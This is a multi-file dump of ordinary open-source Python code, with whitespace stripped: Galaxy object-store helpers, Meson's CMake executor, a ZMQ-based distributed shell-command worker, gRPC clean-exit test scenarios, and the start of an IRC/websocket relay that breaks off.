size = '%.2fGB' % gigabytes
elif bytes >= 1048576:
megabytes = bytes / 1048576
size = '%.2fMB' % megabytes
elif bytes >= 1024:
kilobytes = bytes / 1024
size = '%.2fKB' % kilobytes
else:
size = '%.2fb' % bytes
return size
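# Examples of convert_bytes output (derived from the thresholds above):
#
#     convert_bytes(None)        -> '0.00b'
#     convert_bytes(1536)        -> '1.50KB'
#     convert_bytes(1073741824)  -> '1.00GB'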
def config_to_dict(config):
"""Dict-ify the portion of a config object consumed by the ObjectStore class and its subclasses.
"""
return {
'object_store_check_old_style': config.object_store_check_old_style,
'file_path': config.file_path,
'umask': config.umask,
'jobs_directory': config.jobs_directory,
'new_file_path': config.new_file_path,
'object_store_cache_path': config.object_store_cache_path,
'gid': config.gid,
}
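# Minimal config object satisfying config_to_dict (an illustrative sketch, e.g.
# built with galaxy.util.bunch.Bunch; the concrete values are assumptions):
#
#     Bunch(object_store_check_old_style=False,
#           file_path='database/files',
#           umask=0o077,
#           jobs_directory='database/jobs_directory',
#           new_file_path='database/tmp',
#           object_store_cache_path='database/object_store_cache',
#           gid=None)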
def _create_object_in_session(obj):
session = object_session(obj) if object_session is not None else None
if session is not None:
object_session(obj).add(obj)
object_session(obj).flush()
else:
raise Exception(NO_SESSION_ERROR_MESSAGE)
class ObjectStorePopulator(object):
""" Small helper for interacting with the object store and making sure all
datasets from a job end up with the same object_store_id.
"""
def __init__(self, app):
self.object_store = app.object_store
self.object_store_id = None
def set_object_store_id(self, data):
# Create an empty file immediately. The first dataset will be
# created in the "default" store, all others will be created in
# the same store as the first.
data.dataset.object_store_id = self.object_store_id
try:
self.object_store.create(data.dataset)
except ObjectInvalid:
raise Exception('Unable to create output dataset: object store is full')
self.object_store_id = data.dataset.object_store_id # these will be the same thing after the first output
|
executor.py
|
# Copyright 2019 The Meson development team
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# This class contains the basic functionality needed to run any interpreter
# or an interpreter-based tool.
import subprocess as S
from pathlib import Path
from threading import Thread
import typing as T
import re
import os
import shutil
import ctypes
import textwrap
from .. import mlog, mesonlib
from ..mesonlib import PerMachine, Popen_safe, version_compare, MachineChoice
from ..environment import Environment
from ..envconfig import get_env_var
if T.TYPE_CHECKING:
from ..dependencies.base import ExternalProgram
TYPE_result = T.Tuple[int, T.Optional[str], T.Optional[str]]
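# (returncode, stdout, stderr): _call_quiet fills all three fields, while the
# print_cmout variants stream stdout to mlog and return None for it (the third
# field becomes the collected raw CMake trace in _call_cmout_stderr).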
MESON_TO_CMAKE_MAPPING = {
'arm': 'ARMCC',
'armclang': 'ARMClang',
'clang': 'Clang',
'clang-cl': 'MSVC',
'flang': 'Flang',
'g95': 'G95',
'gcc': 'GNU',
'intel': 'Intel',
'intel-cl': 'MSVC',
'msvc': 'MSVC',
'pathscale': 'PathScale',
'pgi': 'PGI',
'sun': 'SunPro',
}
def meson_compiler_to_cmake_id(cobj):
# clang and apple clang both map to 'clang' in meson, so we need to look at
# the linker that's being used
if cobj.linker.get_id() == 'ld64':
return 'AppleClang'
# If no mapping, try GNU and hope that the build files don't care
return MESON_TO_CMAKE_MAPPING.get(cobj.get_id(), 'GNU')
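# Examples of the mapping above (illustrative):
#
#     meson id 'intel-cl'                     -> 'MSVC'
#     meson id 'clang' with an 'ld64' linker  -> 'AppleClang'
#     unknown ids                             -> 'GNU' (optimistic fallback)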
class CMakeExecutor:
# The class's copy of the CMake path. Avoids having to search for it
# multiple times in the same Meson invocation.
class_cmakebin = PerMachine(None, None)
class_cmakevers = PerMachine(None, None)
class_cmake_cache = {} # type: T.Dict[T.Any, TYPE_result]
def __init__(self, environment: Environment, version: str, for_machine: MachineChoice, silent: bool = False):
self.min_version = version
self.environment = environment
self.for_machine = for_machine
self.cmakebin, self.cmakevers = self.find_cmake_binary(self.environment, silent=silent)
self.always_capture_stderr = True
self.print_cmout = False
self.prefix_paths = [] # type: T.List[str]
self.extra_cmake_args = [] # type: T.List[str]
if self.cmakebin is False:
self.cmakebin = None
return
if not version_compare(self.cmakevers, self.min_version):
mlog.warning(
'The version of CMake', mlog.bold(self.cmakebin.get_path()),
'is', mlog.bold(self.cmakevers), 'but version', mlog.bold(self.min_version),
'is required')
self.cmakebin = None
return
self.prefix_paths = self.environment.coredata.builtins_per_machine[self.for_machine]['cmake_prefix_path'].value
env_pref_path = get_env_var(
self.for_machine,
self.environment.is_cross_build(),
'CMAKE_PREFIX_PATH')
if env_pref_path is not None:
if mesonlib.is_windows():
# Cannot split on ':' on Windows because it's part of the drive letter
env_pref_path = env_pref_path.split(os.pathsep)
else:
# https://github.com/mesonbuild/meson/issues/7294
env_pref_path = re.split(r':|;', env_pref_path)
env_pref_path = [x for x in env_pref_path if x] # Filter out empty strings
if not self.prefix_paths:
self.prefix_paths = []
self.prefix_paths += env_pref_path
if self.prefix_paths:
self.extra_cmake_args += ['-DCMAKE_PREFIX_PATH={}'.format(';'.join(self.prefix_paths))]
def find_cmake_binary(self, environment: Environment, silent: bool = False) -> T.Tuple['ExternalProgram', str]:
from ..dependencies.base import find_external_program
# Only search for CMake the first time and store the result in the class
# definition
if CMakeExecutor.class_cmakebin[self.for_machine] is False:
mlog.debug('CMake binary for %s is cached as not found' % self.for_machine)
elif CMakeExecutor.class_cmakebin[self.for_machine] is not None:
mlog.debug('CMake binary for %s is cached.' % self.for_machine)
else:
assert CMakeExecutor.class_cmakebin[self.for_machine] is None
mlog.debug('CMake binary for %s is not cached' % self.for_machine)
for potential_cmakebin in find_external_program(
environment, self.for_machine, 'cmake', 'CMake',
environment.default_cmake, allow_default_for_cross=False):
version_if_ok = self.check_cmake(potential_cmakebin)
if not version_if_ok:
continue
if not silent:
mlog.log('Found CMake:', mlog.bold(potential_cmakebin.get_path()),
'(%s)' % version_if_ok)
CMakeExecutor.class_cmakebin[self.for_machine] = potential_cmakebin
CMakeExecutor.class_cmakevers[self.for_machine] = version_if_ok
break
else:
if not silent:
mlog.log('Found CMake:', mlog.red('NO'))
# Set to False instead of None to signify that we've already
# searched for it and not found it
CMakeExecutor.class_cmakebin[self.for_machine] = False
CMakeExecutor.class_cmakevers[self.for_machine] = None
return CMakeExecutor.class_cmakebin[self.for_machine], CMakeExecutor.class_cmakevers[self.for_machine]
def check_cmake(self, cmakebin: 'ExternalProgram') -> T.Optional[str]:
if not cmakebin.found():
mlog.log('Did not find CMake {!r}'.format(cmakebin.name))
return None
try:
p, out = Popen_safe(cmakebin.get_command() + ['--version'])[0:2]
if p.returncode != 0:
mlog.warning('Found CMake {!r} but couldn\'t run it'
''.format(' '.join(cmakebin.get_command())))
return None
except FileNotFoundError:
mlog.warning('We thought we found CMake {!r} but now it\'s not there. How odd!'
''.format(' '.join(cmakebin.get_command())))
return None
except PermissionError:
msg = 'Found CMake {!r} but didn\'t have permissions to run it.'.format(' '.join(cmakebin.get_command()))
if not mesonlib.is_windows():
msg += '\n\nOn Unix-like systems this is often caused by scripts that are not executable.'
mlog.warning(msg)
return None
cmvers = re.search(r'(cmake|cmake3)\s*version\s*([\d.]+)', out).group(2)
return cmvers
def set_exec_mode(self, print_cmout: T.Optional[bool] = None, always_capture_stderr: T.Optional[bool] = None) -> None:
if print_cmout is not None:
self.print_cmout = print_cmout
if always_capture_stderr is not None:
self.always_capture_stderr = always_capture_stderr
def _cache_key(self, args: T.List[str], build_dir: str, env):
fenv = frozenset(env.items()) if env is not None else None
targs = tuple(args)
return (self.cmakebin, targs, build_dir, fenv)
def _call_cmout_stderr(self, args: T.List[str], build_dir: str, env) -> TYPE_result:
cmd = self.cmakebin.get_command() + args
proc = S.Popen(cmd, stdout=S.PIPE, stderr=S.PIPE, cwd=build_dir, env=env)
# stdout and stderr MUST be read at the same time to avoid pipe
# blocking issues. The easiest way to do this is with a separate
# thread for one of the pipes.
def print_stdout():
while True:
line = proc.stdout.readline()
if not line:
break
mlog.log(line.decode(errors='ignore').strip('\n'))
proc.stdout.close()
t = Thread(target=print_stdout)
t.start()
try:
# Read stderr line by line and log non trace lines
raw_trace = ''
tline_start_reg = re.compile(r'^\s*(.*\.(cmake|txt))\(([0-9]+)\):\s*(\w+)\(.*$')
inside_multiline_trace = False
while True:
line = proc.stderr.readline()
if not line:
break
line = line.decode(errors='ignore')
if tline_start_reg.match(line):
raw_trace += line
inside_multiline_trace = not line.endswith(' )\n')
elif inside_multiline_trace:
raw_trace += line
else:
mlog.warning(line.strip('\n'))
finally:
proc.stderr.close()
t.join()
proc.wait()
return proc.returncode, None, raw_trace
def _call_cmout(self, args: T.List[str], build_dir: str, env) -> TYPE_result:
cmd = self.cmakebin.get_command() + args
proc = S.Popen(cmd, stdout=S.PIPE, stderr=S.STDOUT, cwd=build_dir, env=env)
while True:
line = proc.stdout.readline()
if not line:
break
mlog.log(line.decode(errors='ignore').strip('\n'))
proc.stdout.close()
proc.wait()
return proc.returncode, None, None
def _call_quiet(self, args: T.List[str], build_dir: str, env) -> TYPE_result:
os.makedirs(build_dir, exist_ok=True)
cmd = self.cmakebin.get_command() + args
ret = S.run(cmd, env=env, cwd=build_dir, close_fds=False,
stdout=S.PIPE, stderr=S.PIPE, universal_newlines=False)
rc = ret.returncode
out = ret.stdout.decode(errors='ignore')
err = ret.stderr.decode(errors='ignore')
call = ' '.join(cmd)
mlog.debug("Called `{}` in {} -> {}".format(call, build_dir, rc))
return rc, out, err
def _call_impl(self, args: T.List[str], build_dir: str, env) -> TYPE_result:
if not self.print_cmout:
return self._call_quiet(args, build_dir, env)
else:
if self.always_capture_stderr:
return self._call_cmout_stderr(args, build_dir, env)
else:
return self._call_cmout(args, build_dir, env)
def call(self, args: T.List[str], build_dir: str, env=None, disable_cache: bool = False) -> TYPE_result:
if env is None:
env = os.environ
args = args + self.extra_cmake_args
if disable_cache:
return self._call_impl(args, build_dir, env)
# First check if cached, if not call the real cmake function
cache = CMakeExecutor.class_cmake_cache
key = self._cache_key(args, build_dir, env)
if key not in cache:
cache[key] = self._call_impl(args, build_dir, env)
return cache[key]
def call_with_fake_build(self, args: T.List[str], build_dir: str, env=None) -> TYPE_result:
# First check the cache
cache = CMakeExecutor.class_cmake_cache
key = self._cache_key(args, build_dir, env)
if key in cache:
return cache[key]
os.makedirs(build_dir, exist_ok=True)
# Try to set the correct compiler for C and C++
# This step is required to make try_compile work inside CMake
fallback = os.path.realpath(__file__) # A file used as a fallback when everything else fails
compilers = self.environment.coredata.compilers[MachineChoice.BUILD]
def make_abs(exe: str, lang: str) -> str:
if os.path.isabs(exe):
return exe
p = shutil.which(exe)
if p is None:
mlog.debug('Failed to find a {} compiler for CMake. This might cause CMake to fail.'.format(lang))
p = fallback
return p
def choose_compiler(lang: str) -> T.Tuple[str, str, str, str]:
comp_obj = None
exe_list = []
if lang in compilers:
comp_obj = compilers[lang]
else:
try:
comp_obj = self.environment.compiler_from_language(lang, MachineChoice.BUILD)
except Exception:
pass
if comp_obj is not None:
exe_list = comp_obj.get_exelist()
comp_id = meson_compiler_to_cmake_id(comp_obj)
comp_version = comp_obj.version.upper()
if len(exe_list) == 1:
return make_abs(exe_list[0], lang), '', comp_id, comp_version
elif len(exe_list) == 2:
return make_abs(exe_list[1], lang), make_abs(exe_list[0], lang), comp_id, comp_version
else:
mlog.debug('Failed to find a {} compiler for CMake. This might cause CMake to fail.'.format(lang))
return fallback, '', 'GNU', ''
c_comp, c_launcher, c_id, c_version = choose_compiler('c')
cxx_comp, cxx_launcher, cxx_id, cxx_version = choose_compiler('cpp')
fortran_comp, fortran_launcher, _, _ = choose_compiler('fortran')
# on Windows, choose_compiler returns path with \ as separator - replace by / before writing to CMAKE file
c_comp = c_comp.replace('\\', '/')
c_launcher = c_launcher.replace('\\', '/')
cxx_comp = cxx_comp.replace('\\', '/')
cxx_launcher = cxx_launcher.replace('\\', '/')
fortran_comp = fortran_comp.replace('\\', '/')
fortran_launcher = fortran_launcher.replace('\\', '/')
# Reset the CMake cache
(Path(build_dir) / 'CMakeCache.txt').write_text('CMAKE_PLATFORM_INFO_INITIALIZED:INTERNAL=1\n')
# Fake the compiler files
comp_dir = Path(build_dir) / 'CMakeFiles' / self.cmakevers
comp_dir.mkdir(parents=True, exist_ok=True)
c_comp_file = comp_dir / 'CMakeCCompiler.cmake'
cxx_comp_file = comp_dir / 'CMakeCXXCompiler.cmake'
fortran_comp_file = comp_dir / 'CMakeFortranCompiler.cmake'
if c_comp and not c_comp_file.is_file():
is_gnu = '1' if c_id == 'GNU' else ''
c_comp_file.write_text(textwrap.dedent('''\
# Fake CMake file to skip the boring and slow stuff
set(CMAKE_C_COMPILER "{}") # Should be a valid compiler for try_compile, etc.
set(CMAKE_C_COMPILER_LAUNCHER "{}") # The compiler launcher (if present)
set(CMAKE_COMPILER_IS_GNUCC {})
set(CMAKE_C_COMPILER_ID "{}")
set(CMAKE_C_COMPILER_VERSION "{}")
set(CMAKE_C_COMPILER_LOADED 1)
set(CMAKE_C_COMPILER_FORCED 1)
set(CMAKE_C_COMPILER_WORKS TRUE)
set(CMAKE_C_ABI_COMPILED TRUE)
set(CMAKE_C_SOURCE_FILE_EXTENSIONS c;m)
set(CMAKE_C_IGNORE_EXTENSIONS h;H;o;O;obj;OBJ;def;DEF;rc;RC)
set(CMAKE_SIZEOF_VOID_P "{}")
'''.format(c_comp, c_launcher, is_gnu, c_id, c_version,
ctypes.sizeof(ctypes.c_voidp))))
if cxx_comp and not cxx_comp_file.is_file():
is_gnu = '1' if cxx_id == 'GNU' else ''
cxx_comp_file.write_text(textwrap.dedent('''\
# Fake CMake file to skip the boring and slow stuff
set(CMAKE_CXX_COMPILER "{}") # Should be a valid compiler for try_compile, etc.
set(CMAKE_CXX_COMPILER_LAUNCHER "{}") # The compiler launcher (if present)
set(CMAKE_COMPILER_IS_GNUCXX {})
set(CMAKE_CXX_COMPILER_ID "{}")
set(CMAKE_CXX_COMPILER_VERSION "{}")
set(CMAKE_CXX_COMPILER_LOADED 1)
set(CMAKE_CXX_COMPILER_FORCED 1)
set(CMAKE_CXX_COMPILER_WORKS TRUE)
set(CMAKE_CXX_ABI_COMPILED TRUE)
set(CMAKE_CXX_IGNORE_EXTENSIONS inl;h;hpp;HPP;H;o;O;obj;OBJ;def;DEF;rc;RC)
set(CMAKE_CXX_SOURCE_FILE_EXTENSIONS C;M;c++;cc;cpp;cxx;mm;CPP)
set(CMAKE_SIZEOF_VOID_P "{}")
'''.format(cxx_comp, cxx_launcher, is_gnu, cxx_id, cxx_version,
ctypes.sizeof(ctypes.c_voidp))))
if fortran_comp and not fortran_comp_file.is_file():
fortran_comp_file.write_text(textwrap.dedent('''\
# Fake CMake file to skip the boring and slow stuff
set(CMAKE_Fortran_COMPILER "{}") # Should be a valid compiler for try_compile, etc.
set(CMAKE_Fortran_COMPILER_LAUNCHER "{}") # The compiler launcher (if present)
set(CMAKE_Fortran_COMPILER_ID "GNU") # Pretend we have found GCC
set(CMAKE_COMPILER_IS_GNUG77 1)
set(CMAKE_Fortran_COMPILER_LOADED 1)
set(CMAKE_Fortran_COMPILER_WORKS TRUE)
set(CMAKE_Fortran_ABI_COMPILED TRUE)
set(CMAKE_Fortran_IGNORE_EXTENSIONS h;H;o;O;obj;OBJ;def;DEF;rc;RC)
set(CMAKE_Fortran_SOURCE_FILE_EXTENSIONS f;F;fpp;FPP;f77;F77;f90;F90;for;For;FOR;f95;F95)
set(CMAKE_SIZEOF_VOID_P "{}")
'''.format(fortran_comp, fortran_launcher, ctypes.sizeof(ctypes.c_voidp))))
return self.call(args, build_dir, env)
def found(self) -> bool:
return self.cmakebin is not None
def version(self) -> str:
return self.cmakevers
def executable_path(self) -> str:
return self.cmakebin.get_path()
def get_command(self) -> T.List[str]:
return self.cmakebin.get_command()
def get_cmake_prefix_paths(self) -> T.List[str]:
return self.prefix_paths
def machine_choice(self) -> MachineChoice:
return self.for_machine
|
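The call()/class_cmake_cache combination above memoises CMake invocations per (args, build_dir, env) key so identical calls are only run once. A minimal standalone sketch of the same pattern, with a hypothetical run_cmake() stand-in for the real subprocess call:

import typing as T

TYPE_result = T.Tuple[int, T.Optional[str], T.Optional[str]]

class CachedRunner:
    # shared across instances, like CMakeExecutor.class_cmake_cache
    _cache: T.Dict[T.Tuple[str, ...], TYPE_result] = {}

    def run_cmake(self, args: T.List[str], build_dir: str) -> TYPE_result:
        # hypothetical stand-in for the real subprocess invocation
        return 0, 'stdout', 'stderr'

    def call(self, args: T.List[str], build_dir: str, disable_cache: bool = False) -> TYPE_result:
        if disable_cache:
            return self.run_cmake(args, build_dir)
        key = (build_dir, *args)
        if key not in CachedRunner._cache:
            CachedRunner._cache[key] = self.run_cmake(args, build_dir)
        return CachedRunner._cache[key]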
worker.py
|
import copy
import os
import subprocess
import time
from multiprocessing import Process
from setproctitle import setproctitle
import zmq
from hayabusa import HayabusaBase
from hayabusa.constants import Status
from hayabusa.errors import unexpected_error
from hayabusa.utils import time_str
class Worker(HayabusaBase):
def __init__(self):
super().__init__('worker')
self.name = 'MainProcess'
self.info('========================='
' Starting Worker '
'=========================')
setproctitle('hayabusa_worker')
self.hostname = os.uname()[1]
config = self.config
self.num_processes = int(config['worker']['process'])
self.request_broker_host = config['request-broker']['host']
self.local_command_port = config['port']['worker-local']
self.receiver_port = config['port']['command']
self.sender_port = config['port']['result']
self.bash_path = config['path']['bash']
receiver_connect = 'tcp://%s:%s' % \
(self.request_broker_host, self.receiver_port)
sender_bind = 'tcp://%s:%s' % ('127.0.0.1', self.local_command_port)
self.info('Command PULL: %s', receiver_connect)
self.info('Command Local PUSH: %s', sender_bind)
pull_context = zmq.Context()
self.main_receiver = pull_context.socket(zmq.PULL)
self.main_receiver.connect(receiver_connect)
push_context = zmq.Context()
self.main_sender = push_context.socket(zmq.PUSH)
self.main_sender.bind(sender_bind)
def worker_label(self):
return '%s-%s' % (self.hostname, self.name)
def __log(self, logger, format, *args):
logger('[%s] - %s', self.name, (format % args))
def info(self, *args):
self.__log(self.logger.info, *args)
def debug(self, *args):
self.__log(self.logger.debug, *args)
def connect_ports(self):
receiver_connect = 'tcp://%s:%s' % \
('127.0.0.1', self.local_command_port)
sender_connect = 'tcp://%s:%s' % \
(self.request_broker_host, self.sender_port)
self.info('Command Local PULL: %s', receiver_connect)
self.info('Result PUSH: %s', sender_connect)
pull_context = zmq.Context()
self.receiver = pull_context.socket(zmq.PULL)
self.receiver.connect(receiver_connect)
push_context = zmq.Context()
self.sender = push_context.socket(zmq.PUSH)
self.sender.connect(sender_connect)
def start(self):
self.info('Starting %s Worker Processes: %s', self.num_processes,
self.hostname)
for i in range(self.num_processes):
p = Process(target=self.main_loop, args=(i+1,))
p.start()
# Load balancing
while True:
message = self.main_receiver.recv()
self.main_sender.send(message)
def notify(self, message):
new_message = copy.deepcopy(message)
new_message['type'] = 'notice'
new_message['worker'] = self.worker_label()
new_message['message'] = Status.RW_ReceivedCommand.name
self.sender.send_json(new_message)
self.debug('[%s] - %s',
Status.WR_SentNotice, new_message)
def send_result(self, start_time, message, process):
stdout = process.stdout
stderr = process.stderr
exit_status = process.returncode
new_message = copy.deepcopy(message)
new_message['type'] = 'result'
new_message['worker'] = self.worker_label()
new_message['stderr'] = stderr
new_message['exit_status'] = exit_status
new_message['stdout'] = stdout
elapsed_time = float('%.3f' % (time.time() - start_time))
new_message['elapsed_time'] = elapsed_time
self.sender.send_json(new_message)
log_message = self.log_filter(new_message)
self.debug('[%s] [%s]: %s', Status.WR_SentResult,
time_str(time.time() - start_time), log_message)
def main_loop(self, index):
self.name = 'Process-%s' % index
self.info('Starting Process: %s', self.name)
message = {}
try:
self.connect_ports()
while True:
# Wait for next command from Request Broker
message = self.receiver.recv_json()
self.main(message)
except Exception as e:
unexpected_error(self.logger, 'Worker-%s' % self.name, e, message)
raise
def main(self, message):
start_time = time.time()
self.debug('[%s] - %s', Status.RW_ReceivedCommand, message)
self.notify(message)
cmd = message['command']
# Bash is required for 'Brace Expansion'.
process = subprocess.run(cmd, executable=self.bash_path, shell=True,
encoding='utf-8', stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.send_result(start_time, message, process)
|
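A minimal, self-contained sketch of the execution step in Worker.main() above: the command string is handed to bash via shell=True so that features such as brace expansion work. The '/bin/bash' path here is an assumption; the real worker reads it from its config file.

import subprocess
import time

start_time = time.time()
# Bash is required for 'Brace Expansion' (see Worker.main above).
proc = subprocess.run('echo file_{a,b}.txt', executable='/bin/bash', shell=True,
                      encoding='utf-8', stdout=subprocess.PIPE, stderr=subprocess.PIPE)
elapsed_time = float('%.3f' % (time.time() - start_time))
print(proc.returncode, proc.stdout.strip(), elapsed_time)
# expected: 0 file_a.txt file_b.txt <elapsed seconds>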
_exit_scenarios.py
|
# Copyright 2016 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Defines a number of module-scope gRPC scenarios to test clean exit."""
import argparse
import logging
import threading
import time
import grpc
from tests.unit.framework.common import test_constants
WAIT_TIME = 1000
REQUEST = b'request'
UNSTARTED_SERVER = 'unstarted_server'
RUNNING_SERVER = 'running_server'
POLL_CONNECTIVITY_NO_SERVER = 'poll_connectivity_no_server'
POLL_CONNECTIVITY = 'poll_connectivity'
IN_FLIGHT_UNARY_UNARY_CALL = 'in_flight_unary_unary_call'
IN_FLIGHT_UNARY_STREAM_CALL = 'in_flight_unary_stream_call'
IN_FLIGHT_STREAM_UNARY_CALL = 'in_flight_stream_unary_call'
IN_FLIGHT_STREAM_STREAM_CALL = 'in_flight_stream_stream_call'
IN_FLIGHT_PARTIAL_UNARY_STREAM_CALL = 'in_flight_partial_unary_stream_call'
IN_FLIGHT_PARTIAL_STREAM_UNARY_CALL = 'in_flight_partial_stream_unary_call'
IN_FLIGHT_PARTIAL_STREAM_STREAM_CALL = 'in_flight_partial_stream_stream_call'
UNARY_UNARY = b'/test/UnaryUnary'
UNARY_STREAM = b'/test/UnaryStream'
STREAM_UNARY = b'/test/StreamUnary'
STREAM_STREAM = b'/test/StreamStream'
PARTIAL_UNARY_STREAM = b'/test/PartialUnaryStream'
PARTIAL_STREAM_UNARY = b'/test/PartialStreamUnary'
PARTIAL_STREAM_STREAM = b'/test/PartialStreamStream'
TEST_TO_METHOD = {
IN_FLIGHT_UNARY_UNARY_CALL: UNARY_UNARY,
IN_FLIGHT_UNARY_STREAM_CALL: UNARY_STREAM,
IN_FLIGHT_STREAM_UNARY_CALL: STREAM_UNARY,
IN_FLIGHT_STREAM_STREAM_CALL: STREAM_STREAM,
IN_FLIGHT_PARTIAL_UNARY_STREAM_CALL: PARTIAL_UNARY_STREAM,
IN_FLIGHT_PARTIAL_STREAM_UNARY_CALL: PARTIAL_STREAM_UNARY,
IN_FLIGHT_PARTIAL_STREAM_STREAM_CALL: PARTIAL_STREAM_STREAM,
}
def hang_unary_unary(request, servicer_context):
time.sleep(WAIT_TIME)
def hang_unary_stream(request, servicer_context):
time.sleep(WAIT_TIME)
def hang_partial_unary_stream(request, servicer_context):
for _ in range(test_constants.STREAM_LENGTH // 2):
yield request
time.sleep(WAIT_TIME)
def hang_stream_unary(request_iterator, servicer_context):
time.sleep(WAIT_TIME)
def hang_partial_stream_unary(request_iterator, servicer_context):
for _ in range(test_constants.STREAM_LENGTH // 2):
next(request_iterator)
time.sleep(WAIT_TIME)
def hang_stream_stream(request_iterator, servicer_context):
time.sleep(WAIT_TIME)
def hang_partial_stream_stream(request_iterator, servicer_context):
for _ in range(test_constants.STREAM_LENGTH // 2):
yield next(request_iterator) #pylint: disable=stop-iteration-return
time.sleep(WAIT_TIME)
class MethodHandler(grpc.RpcMethodHandler):
def __init__(self, request_streaming, response_streaming, partial_hang):
self.request_streaming = request_streaming
self.response_streaming = response_streaming
self.request_deserializer = None
self.response_serializer = None
self.unary_unary = None
self.unary_stream = None
self.stream_unary = None
self.stream_stream = None
if self.request_streaming and self.response_streaming:
if partial_hang:
self.stream_stream = hang_partial_stream_stream
else:
self.stream_stream = hang_stream_stream
elif self.request_streaming:
if partial_hang:
self.stream_unary = hang_partial_stream_unary
else:
self.stream_unary = hang_stream_unary
elif self.response_streaming:
if partial_hang:
self.unary_stream = hang_partial_unary_stream
else:
self.unary_stream = hang_unary_stream
else:
self.unary_unary = hang_unary_unary
class GenericHandler(grpc.GenericRpcHandler):
def service(self, handler_call_details):
if handler_call_details.method == UNARY_UNARY:
return MethodHandler(False, False, False)
elif handler_call_details.method == UNARY_STREAM:
return MethodHandler(False, True, False)
elif handler_call_details.method == STREAM_UNARY:
return MethodHandler(True, False, False)
elif handler_call_details.method == STREAM_STREAM:
return MethodHandler(True, True, False)
elif handler_call_details.method == PARTIAL_UNARY_STREAM:
return MethodHandler(False, True, True)
elif handler_call_details.method == PARTIAL_STREAM_UNARY:
return MethodHandler(True, False, True)
elif handler_call_details.method == PARTIAL_STREAM_STREAM:
return MethodHandler(True, True, True)
else:
return None
# Traditional executors will not exit until all their
# current jobs complete. Because we submit jobs that will
# never finish, we don't want to block exit on these jobs.
class DaemonPool(object):
def submit(self, fn, *args, **kwargs):
thread = threading.Thread(target=fn, args=args, kwargs=kwargs)
thread.daemon = True
thread.start()
def shutdown(self, wait=True):
pass
def infinite_request_iterator():
while True:
yield REQUEST
if __name__ == '__main__':
logging.basicConfig()
parser = argparse.ArgumentParser()
parser.add_argument('scenario', type=str)
parser.add_argument('--wait_for_interrupt',
dest='wait_for_interrupt',
action='store_true')
args = parser.parse_args()
if args.scenario == UNSTARTED_SERVER:
server = grpc.server(DaemonPool(), options=(('grpc.so_reuseport', 0),))
if args.wait_for_interrupt:
time.sleep(WAIT_TIME)
elif args.scenario == RUNNING_SERVER:
server = grpc.server(DaemonPool(), options=(('grpc.so_reuseport', 0),))
port = server.add_insecure_port('[::]:0')
server.start()
if args.wait_for_interrupt:
time.sleep(WAIT_TIME)
elif args.scenario == POLL_CONNECTIVITY_NO_SERVER:
channel = grpc.insecure_channel('localhost:12345')
def connectivity_callback(connectivity):
pass
channel.subscribe(connectivity_callback, try_to_connect=True)
if args.wait_for_interrupt:
time.sleep(WAIT_TIME)
elif args.scenario == POLL_CONNECTIVITY:
server = grpc.server(DaemonPool(), options=(('grpc.so_reuseport', 0),))
port = server.add_insecure_port('[::]:0')
server.start()
channel = grpc.insecure_channel('localhost:%d' % port)
def connectivity_callback(connectivity):
pass
channel.subscribe(connectivity_callback, try_to_connect=True)
if args.wait_for_interrupt:
time.sleep(WAIT_TIME)
else:
handler = GenericHandler()
server = grpc.server(DaemonPool(), options=(('grpc.so_reuseport', 0),))
port = server.add_insecure_port('[::]:0')
server.add_generic_rpc_handlers((handler,))
server.start()
channel = grpc.insecure_channel('localhost:%d' % port)
method = TEST_TO_METHOD[args.scenario]
if args.scenario == IN_FLIGHT_UNARY_UNARY_CALL:
multi_callable = channel.unary_unary(method)
future = multi_callable.future(REQUEST)
result, call = multi_callable.with_call(REQUEST)
elif (args.scenario == IN_FLIGHT_UNARY_STREAM_CALL or
args.scenario == IN_FLIGHT_PARTIAL_UNARY_STREAM_CALL):
multi_callable = channel.unary_stream(method)
response_iterator = multi_callable(REQUEST)
for response in response_iterator:
pass
elif (args.scenario == IN_FLIGHT_STREAM_UNARY_CALL or
args.scenario == IN_FLIGHT_PARTIAL_STREAM_UNARY_CALL):
multi_callable = channel.stream_unary(method)
future = multi_callable.future(infinite_request_iterator())
result, call = multi_callable.with_call(
iter([REQUEST] * test_constants.STREAM_LENGTH))
elif (args.scenario == IN_FLIGHT_STREAM_STREAM_CALL or
args.scenario == IN_FLIGHT_PARTIAL_STREAM_STREAM_CALL):
multi_callable = channel.stream_stream(method)
response_iterator = multi_callable(infinite_request_iterator())
for response in response_iterator:
pass
|
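The DaemonPool above exists so that handlers which never return cannot block interpreter shutdown. A tiny standalone illustration of that property (not part of the gRPC test suite itself):

import threading
import time

def hang():
    time.sleep(1000)  # simulates a handler that never finishes

thread = threading.Thread(target=hang)
thread.daemon = True  # daemon threads are abandoned at interpreter exit
thread.start()
print('main thread can exit even though the job is still sleeping')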
relay.py
|
#!/usr/bin/env python3
import hashlib
import html
import json
import re
import socketserver
import sys
import threading
import time
import configparser
import requests
import websocket
socketserver.TCPServer.allow_reuse_address = True
IRCRE = (r'^(?::(\S+?)(?:!(\S+?))?(?:@(\S+?))? )?' # Nick!User@Host
+ r'(\S+)(?: (?!:)(.+?))?(?: :(.+))?$') # CMD Params Params :Message
IRC_MAX_BYTES = 512
IRC_CHANPREFIX = '#'
# TODO: Better splitting algorithm
def splitbytes(mystr, maxbytes, encoding):
while mystr:
target = maxbytes
while True:
segment = mystr[:target].encode(encoding)
if len(segment) <= maxbytes:
yield segment
break
target -= 1
if target <= 0:
raise Exception('unable to split string within the byte limit')
mystr = mystr[target:]
# TODO: Normalize error handling
class TCPHandler(socketserver.BaseRequestHandler):
'''Handles IRC (TCP) and SBS (WS) connections'''
# ----- TCP Event Handlers -----
def handle(self):
buf = b''
while True:
data = self.request.recv(1024)
if not data: break
buf += data
*lines, buf = buf.split(b'\r\n')
for line in lines:
print(b'irc<' + line) # log incoming data
self.irc_handle(line.decode(self.config['encoding'], 'replace'))
# TODO: better disconnect handling
self.ws.close()
